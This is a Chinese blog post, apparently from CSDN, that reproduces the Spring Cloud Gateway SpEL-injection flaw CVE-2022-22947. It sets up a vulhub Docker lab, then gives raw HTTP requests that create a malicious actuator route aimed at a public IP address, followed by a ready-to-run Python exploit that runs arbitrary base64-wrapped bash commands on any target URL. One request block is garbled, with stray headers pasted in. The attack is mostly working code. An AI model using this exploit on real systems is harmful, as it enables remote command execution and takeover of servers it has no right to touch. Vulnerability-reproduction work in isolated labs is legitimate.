Spring Cloud Gateway远程代码执行漏洞复现(CVE-2022-22947)

最新推荐文章于 2024-06-02 11:50:48 发布
最新推荐文章于 2024-06-02 11:50:48 发布
阅读量1.4k 收藏 1
点赞数
分类专栏: 漏洞复现及思路 文章标签: spring cloud gateway java
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44930903/article/details/123510344
版权

Spring Cloud Gateway远程代码执行漏洞复现(CVE-2022-22947)

遵纪守法

任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得危害网络安全,不得利用网络从事危害国家安全、荣誉和利益

漏洞描述:

Spring Cloud Gateway是Spring中的一个API网关。其3.1.0及3.0.6版本(包含)以前存在一处SpEL表达式注入漏洞,当攻击者可以访问ActuatorAPI的情况下,将可以利用该漏洞执行任意命令。

漏洞影响:

3.1.0、 3.0.0至3.0.6、 3.0.0之前的版本

案例

app="vmware-SpringBoot-framework"

环境搭建

# 下载包
wget https://github.com/vulhub/vulhub/archive/master.zip -O vulhub-master.zip
# 解压包
unzip vulhub-master.zip
# 进入vulhub目录,开启漏洞环境
vulhub/spring/CVE-2022-22947
docker-compose  up -d
#漏洞环境拉取成功后访问
http://ip:8080/

1.png

漏洞复现

  • 1
POST /actuator/gateway/routes/WeianSec HTTP/1.1
Host: 162.14.69.165:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close
Content-Type: application/json
Content-Length: 330

{
  "id": "WeianSec",
  "filters": [{
    "name": "AddResponseHeader",
    "args": {
      "name": "Result",
      "value": "#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\"id\"}).getInputStream()))}"
    }
  }],
  "uri": "http://example.com"
}
  • 2
POST /actuator/gateway/refresh HTTP/1.1
Host: 162.14.69.165:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close
Content-Type: application/json
Content-Length: 456

Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
  • 3
GET /actuator/gateway/routes/WeianSec HTTP/1.1
Host: 162.14.69.165:8080
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

2.png

exp

#!python3
import requests, json, sys, base64

#proxies = {'http':'http://127.0.0.1:8080','https':'http://127.0.0.1:8080'}


def rce(url, cmd):
    h1 = {
      'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36',
      'Content-Type': 'application/json'
    }
    data = {
    "id": "ee",
    "filters": [{
        "name": "AddResponseHeader",
        "args": {
            "name": "Result",
            "value": "#{new java.lang.String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(\"" + cmd +"\").getInputStream()))}"
        }
    }],
    "uri": "http://aaaa.aa",
    "order": 0
}

    res1 = requests.post('{}/actuator/gateway/routes/ee'.format(url), data = json.dumps(data, ensure_ascii = False), headers = h1, verify = False)#, proxies = proxies)
    res2 = requests.post('{}/actuator/gateway/refresh'.format(url), headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36',}, verify = False)
    res3 = requests.get('{}/actuator/gateway/routes/ee'.format(url), headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36',}, verify = False)
    print(res3.text)


if __name__ == "__main__":
  
  url = sys.argv[-2]
  if url[-1] == '/':
    url = url[:-1]
  cmd = sys.argv[-1]
  cmd = 'bash -c {echo,' + base64.b64encode(cmd.encode()).decode() + '}|{base64,-d}|{bash,-i}'
  if not (url.startswith('http://') or url.startswith('https://')):
    print('使用: python cve-2022-22947.py  url  cmd')
    sys.exit(1)
  rce(url, cmd)
悲伤艾草
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CVE-2022-22947 Spring Cloud Gateway 远程代码执行漏洞
weixin_45260839的博客
05-08 3094
CVE-2022-22947 Spring Cloud Gateway 远程代码执行漏洞
spring-boot-upload-file-lead-to-rce-tricks:spring boot Fat Jar 应用文件上传漏洞到 RCE 的利用技巧
04-12
spring-boot-upload-file-lead-to-rce-tricks 一. docker 漏洞环境搭建 docker pull landgrey/spring-boot-fat-jar-write-file-rce:1.2 docker run -d -p 18081:18081 landgrey/spring-boot-fat-jar-write-file-rce:1.2 完成后访问 二. 相关文章 三. 常见 JDK 目录收集 欢迎提 issue 补充:clapping_hands:~ /usr/lib/jvm/java-8-oracle/jre/lib/ /usr/lib/jvm/java-1.8-openjdk/jre/lib/ /usr/lib/jvm/java-8-openjdk-amd64/jre/lib/ 四. docker 漏洞环境的功能 文件上传功能 (默认上传到 /tmp/ 目录,
idea 集成docker部署springcloud
荡漾
09-04 1392
# vim /usr/lib/systemd/system/docker.service ExecStart=/usr/bin/dockerd-current 后面加上 -H tcp://0.0.0.0:2375 -H unix://var/run/docker.sock ctrl + shift +alt +s 配置docker 连接 创建Docke...
spring clolud中的Gateway
weixin_45573037的博客
08-15 304
Gateway(网关) 1.什么是网关 网关字面意思就可以理解为网络的关卡,就是立在真正的服务与用户之间的一道关卡,隐藏了微服务的节点和ip,从而起到保护的作用.他的核心组件就是一系列的过滤器,通过过滤器将用户的请求转发到对应得微服务. 2.核心概念 路由(route) 路由信息的组成:由一个ID、一个目的URL、一组断言工厂、一组Filter组成。如果路由断言为真,说明请求URL和配置路由匹配 断言(Predicate) Spring Cloud Gateway中的断言函数输入类型是Spring 5
Spring Cloud Gateway RCE漏洞原理分析与CVE-2022-22947)
日常技术分享
10-16 4102
Spring Cloud Gateway RCE漏洞原理分析与CVE-2022-22947)
CVE-2022-22947-Spring Cloud Gateway RCE漏洞
qq_18209847的博客
04-03 5567
Spring Cloud Gateway 远程代码执行漏洞CVE-2022-22947)发生在Spring Cloud Gateway应用程序的Actuator端点,其在启用、公开和不安全的情况下容易受到代码注入的攻击
CVE-2022-22947
xuexi056的博客
04-15 351
cve-2022-22947
CVE-2022-22947 远程代码执行漏洞
weixin_45715461的博客
07-09 728
CVE-2022-22947 远程代码执行漏洞
CVE-2022-22947( Spring Cloud Gateway )SPEL RCE
问题很多的小明
03-03 1406
CVE-2022-22947( Spring Cloud Gateway )SPEL RCE
CVE-2022-22947-Spring-Cloud-Gateway 内存马POC
03-29
Spring官方博客发布了一篇关于Spring Cloud Gateway的CVE报告,据公告描述,当启用和暴露 Gateway Actuator 端点时,使用 Spring Cloud Gateway 的应用程序可受到代码注入攻击。攻击者可以发送特制的恶意请求,从而...
Apache Log4j 远程代码执行漏洞(CVE-2021-44832)
10-25
Java 6 将 log4j 升级到 2.3.2 版本,Java 7 将 log4j 升级到 2.12.4 版本,Java 8 或更高版本将 log4j 升级到 2.17.1 版本
spring Framework 远程命令执行漏洞CVE-2022-22965漏洞脚本自用
10-27
spring Framework 远程命令执行漏洞CVE-2022-22965漏洞脚本自用
Spring Cloud Gateway 使用
Python小二
10-02 1750
简介 Spring Cloud GatewaySpring Cloud 官方推出的网关框架,网关作为流量入口,在微服务系统中有着十分重要的作用,常用功能包括:鉴权、路由转发、熔断、限流等。 Spring Cloud Gateway 是通过 Spring WebFlux 的 HandlerMapping 做为底层支持来匹配到转发路由,使用时不要引入 SpringMVC,否则初始化时会出错;Sp...
Gateway+Oauth2授权码登录
天眼 的博客
05-27 592
走网关无法返回授权码和强制路径server.servlet.context-path:的问题解决
网关(Gateway- 内置过滤器工厂
最新发布
问天丶天问
06-02 424
网关(gateway)内置过滤器工厂使用说明保姆级教程
springcloud项目部署Nginx+Gateway+其他服务
qq_58968195的博客
05-29 970
springcloud项目部署
PHP 远程代码执行漏洞(CVE-2022-31625)修办法
07-14
针对PHP远程代码执行漏洞(CVE-2022-31625),以下是一些修方法: 1. 更新到最新版本:确保你的PHP版本是最新的,因为漏洞通常会包含在更新中。请访问PHP官方网站或者使用包管理工具来获取最新版本。 2. 禁用...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值